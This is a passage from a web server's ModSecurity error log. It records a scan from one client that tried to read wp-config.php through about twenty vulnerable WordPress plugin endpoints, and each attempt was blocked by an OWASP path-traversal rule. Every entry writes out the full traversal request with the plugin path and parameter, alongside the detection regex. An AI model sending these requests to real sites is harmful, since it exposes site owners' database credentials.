"Y8DxB8x9A9c0KkSpLadP-AAAAIo"] [Fri Jan 13 00:49:59.946316 2023] [:error] [pid 31476:tid 140315205777152] [client 185.206.224.212:42736] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php"] [unique_id "Y8DxB6GMrWzzUVMdEhcLsQAAAM8"] [Fri Jan 13 00:50:00.060953 2023] [:error] [pid 31043:tid 140315397105408] [client 185.206.224.212:42738] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/myflash/myflash-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/myflash/myflash-button.php"] [unique_id "Y8DxCMx9A9c0KkSpLadP-gAAAIE"] [Fri Jan 13 00:50:00.192248 2023] [:error] [pid 31042:tid 140315264526080] [client 185.206.224.212:42740] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php"] [unique_id "Y8DxCI6vAq65Ygpdg5ObLQAAAEg"] [Fri Jan 13 00:50:00.307693 2023] [:error] [pid 31041:tid 140315147028224] [client 185.206.224.212:42742] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/old-post-spinner/logview.php"] [unique_id "Y8DxCMPRCDYHCWWhHpAjowAAABY"] [Fri Jan 13 00:50:00.422486 2023] [:error] [pid 31042:tid 140315281311488] [client 185.206.224.212:42744] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/page-flip-image-gallery/books/getConfig.php"] [unique_id "Y8DxCI6vAq65Ygpdg5ObLgAAAEY"] [Fri Jan 13 00:50:00.537765 2023] [:error] [pid 31476:tid 140315272918784] [client 185.206.224.212:42746] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/photocart-link/decode.php?id=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/photocart-link/decode.php"] [unique_id "Y8DxCKGMrWzzUVMdEhcLsgAAAMc"] [Fri Jan 13 00:50:00.656735 2023] [:error] [pid 31041:tid 140315188991744] [client 185.206.224.212:42748] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pica-photo-gallery/picadownload.php"] [unique_id "Y8DxCMPRCDYHCWWhHpAjpAAAABE"] [Fri Jan 13 00:50:00.773437 2023] [:error] [pid 31042:tid 140315272918784] [client 185.206.224.212:42752] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pictpress/resize.php?size=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pictpress/resize.php"] [unique_id "Y8DxCI6vAq65Ygpdg5ObLwAAAEc"] [Fri Jan 13 00:50:00.896413 2023] [:error] [pid 31476:tid 140315405498112] [client 185.206.224.212:42754] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "Y8DxCKGMrWzzUVMdEhcLswAAAMA"] [Fri Jan 13 00:50:01.035299 2023] [:error] [pid 31476:tid 140315298096896] [client 185.206.224.212:42756] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php"] [unique_id "Y8DxCaGMrWzzUVMdEhcLtAAAAMQ"] [Fri Jan 13 00:50:01.155319 2023] [:error] [pid 31043:tid 140315130242816] [client 185.206.224.212:42758] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/rb-agency/ext/forcedownload.php"] [unique_id "Y8DxCcx9A9c0KkSpLadP_AAAAJg"] [Fri Jan 13 00:50:01.270753 2023] [:error] [pid 31476:tid 140315155420928] [client 185.206.224.212:42760] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "Y8DxCaGMrWzzUVMdEhcLtQAAANU"] [Fri Jan 13 00:50:01.385325 2023] [:error] [pid 31041:tid 140315180599040] [client 185.206.224.212:42762] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/relocate-upload/relocate-upload.php"] [unique_id "Y8DxCcPRCDYHCWWhHpAjpQAAABI"] [Fri Jan 13 00:50:01.503089 2023] [:error] [pid 31476:tid 140315264526080] [client 185.206.224.212:42764] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/robotcpa/f.php"] [unique_id "Y8DxCaGMrWzzUVMdEhcLtgAAAMg"] [Fri Jan 13 00:50:01.630685 2023] [:error] [pid 31476:tid 140315239347968] [client 185.206.224.212:42766] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "Y8DxCaGMrWzzUVMdEhcLtwAAAMs"] [Fri Jan 13 00:50:01.746009 2023] [:error] [pid 31476:tid 140315197384448] [client 185.206.224.212:42768] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/se-html5-album-audio-player/download_audio.php"] [unique_id "Y8DxCaGMrWzzUVMdEhcLuAAAANA"] [Fri Jan 13 00:50:01.873929 2023] [:error] [pid 31476:tid 140315222562560] [client 185.206.224.212:42770] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sell-downloads/sell-downloads.php"] [unique_id "Y8DxCaGMrWzzUVMdEhcLuQAAAM0"] [Fri Jan 13 00:50:01.989410 2023] [:error] [pid 31476:tid 140315306489600] [client 185.206.224.212:42772] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sf-booking/lib/downloads.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sf-booking/lib/downloads.php"] [unique_id "Y8DxCaGMrWzzUVMdEhcLugAAAMM"] [Fri Jan 13 00:50:02.105203 2023] [:error] [pid 31476:tid 140315214169856] [client 185.206.224.212:42774] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "Y8DxCqGMrWzzUVMdEhcLuwAAAM4"] [Fri Jan 13 00:50:02.221858 2023] [:error] [pid 31041:tid 140315264526080] [client 185.206.224.212:42776] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "Y8DxCsPRCDYHCWWhHpAjpgAAAAg"] [Fri Jan 13 00:50:02.338736 2023] [:error] [pid 31041:tid 140315214169856] [client 185.206.224.212:42778] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "Y8DxCsPRCDYHCWWhHpAjpwAAAA4"] [Fri Jan 13 00:50:02.454245 2023] [:error] [pid 31041:tid 140315397105408] [client 185.206.224.212:42780] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id 